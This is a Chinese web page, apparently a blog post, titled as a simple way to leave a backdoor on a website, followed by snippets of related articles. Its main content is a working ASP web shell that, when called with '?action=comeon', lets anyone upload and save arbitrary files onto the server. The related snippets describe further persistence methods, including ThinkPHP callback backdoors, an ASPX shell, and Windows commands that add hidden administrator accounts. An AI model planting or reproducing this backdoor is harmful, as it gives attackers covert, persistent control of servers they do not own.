简单给站点留后门

 <%if request.QueryString("action")="comeon" then
a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-3:h.Position=0:h.type=2:h.CharSet="BIG5":i=h.Readtext:h.close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h.Type=1:h.Open:c.Position=k-1:c.CopyTo h,l:h.SaveToFile server.mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form>
<%end if%>

?action=comeon

地址?action=comeon

时间: 2024-11-10 20:17:02

简单给站点留后门的相关文章

java 自定义异常,记录日志简单说明!留着以后真接复制

log4j 相关配制说明:http://blog.csdn.net/liangrui1988/article/details/17435139 自定义异常 package org.rui.ExceptionTest; public class ExtraFeature { //-------使用------ public static void f()throws MyException { System.out.println("MyException from f()"); thr

ThinkPHP留后门技巧

原文链接:https://www.leavesongs.com/PENETRATION/thinkphp-callback-backdoor.html 90sec上有人问,我说了还有小白不会用.去年我审计TP的时候留意到的,干脆分析一下代码和操作过程. thinkphp的I函数,是其处理输入的函数,一般用法为I('get.id')——从$_GET数组中取出键为id的值,post.cookie类似. let me see see I函数的代码: 01 function I($name, $defa

使用大白菜U盘进入PE后再次重启电脑会留后门的清理方法

使用大白菜U盘进入PE后再次重启电脑会留后门,这个后门主要是自动下载安装一些软件,比如金山毒霸等. 清除方法: 1.每次用完PE重启前,清理以下地方: ①c:\Windows\xxxxx.exe(查看详细信息时会显示大白菜U盘工具) ②C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp(删除全部vbs脚本)

钩子编程(HOOK) 留后门与钩子卸载

作者 : 卿笃军 问题由来:一般编写钩子程序,我们希望程序一方面能屏蔽键盘鼠标消息,但又希望程序能留有一个"后门",例如,按下F2退出程序. 下面示例,钩子后门设计与钩子卸载: 第一步:打开VC6.0创建一个基于对话框的MFC应用程序. 第二步:在BOOL CHookDlg::OnInitDialog()函数上面编写如下代码,注意不是OnInitDialog()里面: HWND g_hWnd = NULL; //窗口句柄 HHOOK g_hKeyboard = NULL; //钩子句柄

入侵者已经拿到了主机的管理员权限,请你列举几种留后门的方法:(windows和LINUX系统均可)

Webshell后门 XSS后门 远控后门&rootit(windows&LINUX) SSH后门 SHIFT终端服务器后门 系统用户账号克隆 SQL数据库扩展存储型后门 SQL数据库沙盒模式后门 Oralce/mysql自定义函数 Oralce的特权用户 文件捆绑型后门 下载系统用户密码HASH到本地进行破解 IIS/Tomcat/WEBLOGIC/APACHE应用型后门 键盘记录 .... 后面的继续,HEHE 收藏感谢(0) 分享到:0 32 个回复 1#哲璇 (<小学结业生&

CentOS6和CentOS7中简单web站点的配置步骤

一.CentOS6中简单的web站点的配置实例:1.安装httpd:~]# yum install -y httpd httpd-manual httpd-tools //安装httpd应用程序所需要的必要文档文件2.确保SElinux和iptables防火墙不会干扰httpd服务的提供:SElinux配置:~]# getenforce //查看SELinux状态Enforcing~]# setenforce 0 //设置SELinux为防火墙:~]# iptables -vnL //查看主机是

java 自己定义异常,记录日志简单说明!留着以后真接复制

log4j 相关配制说明:http://blog.csdn.net/liangrui1988/article/details/17435139 自己定义异常 package org.rui.ExceptionTest; public class ExtraFeature { //-------使用------ public static void f()throws MyException { System.out.println("MyException from f()"); th

ASPX版菜刀一句话,留后门专用

首先解释一下为什么要做这个玩意:众所周知.net一句话是不能插入到文件之中的,除非那个页面使用Jscript编写,但是现在看来 Jscript市场很低,遇到的.net站基本都是C#.新建一个SHELL太过于明显,而且其中的eval更是在WEBSHELL扫描工具的淫威下直接 出局.如果不能提权的话,那么过一段时间再打开往往面临的是大大的404.综上,利用.net会加载bin目录中的类库的特点和命名空间这个神奇 的东西编写了这个程序,将文件放在bin目录并在文件中插入调用代码即可.可能你会说放在bi

windows留后门与局域网抓包

嗅探3389密码wiresharkcain windows安装后门:账号后门:net usernet user 账号$ 密码 /add 加$符变为隐藏账号net localgrop administrators 账号 /add net user 账号 /del 删除账号 系统自带账号改密码 记录名字 regedit 打开注册表 HKEY_LOCAL_MACHINE->SAM->SAM 右键设置权限 刷新 users->name 找到账号 看类型 上面找到该账号 先找到管理员(admini